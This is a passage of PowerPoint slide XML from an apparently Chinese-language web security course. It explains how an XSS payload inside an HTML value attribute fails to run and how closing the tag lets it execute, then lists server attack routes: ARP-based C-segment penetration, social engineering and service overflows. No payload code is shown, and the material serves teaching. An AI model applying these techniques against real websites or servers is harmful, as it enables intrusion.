                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>pu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>标签，使输出的内容不在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>lu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>属性中，从而造成</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跨站漏</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="880276"/>
            <a:ext cx="3397250" cy="1334770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="21590" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码虽然成功地插入到了</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>中，但却无法执行，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码出现在  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Value</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>属性中，被当作值来处理，最终浏览器解析</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>时，将会把数据以文本的 形式输出在网页中。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="825"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>确定了输出点之后，就可以根据相应的标签构造</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码来闭合。插入下面的</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130">
              <a:lnSpc>
                <a:spcPts val="825"/>
              </a:lnSpc>
            </a:pP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代码到上面的代码中：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="610"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>最</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="191B0E"/>
              </a:buClr>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:endParaRPr sz="900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="3054985" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="655"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>这 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1485023" y="1468247"/>
            <a:ext cx="3648456" cy="65303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53225"/>
            <a:ext cx="3407410" cy="1957705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="80010" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="630"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>应用安全基础</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="34290" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="88300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pP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应用程序有四个要点</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>数据库、编程语言</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="35">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、</a:t>
            </a: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容器和优秀的</a:t>
            </a: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应用程序的设 计者，这四者缺一不可。优秀的设计人员设计个性化的程</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>序</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，编程语言将这些设计变 为真实的存在，且悄悄地与数据库连</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>接</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，让数据库存储好数据，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="35">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>而</a:t>
            </a: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容器作为终端 解析用户请求和脚本语言等。当用户通过统一资源定位</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>符</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>访问</a:t>
            </a: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时，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>最终 看到的是</a:t>
            </a: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容器处理后的内</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>容</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="35">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>档</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pP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网站默认运行在服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>端口上，是服务器提供的众多互联网服务之</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>一</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击者在渗透服务器时，其直接攻击目标一般有三种手段</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="75565" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="690"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>段渗透：攻击者通过渗透同一网段内的一台主机对目标主机进行</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>等手段的 渗</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>透</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="17780" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="690"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="245"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>社会工程学：社会工程学是高端攻击者必须掌握的一个技</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>能</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，渗透服务器有时不 仅仅只靠技</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>术</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="5080" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="81800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="254"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Services</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>很多传统的攻击方式是直接针对服务进行溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，至今一些软件仍然 存在溢出漏</a:t>
            </a:r>
            <a:r>
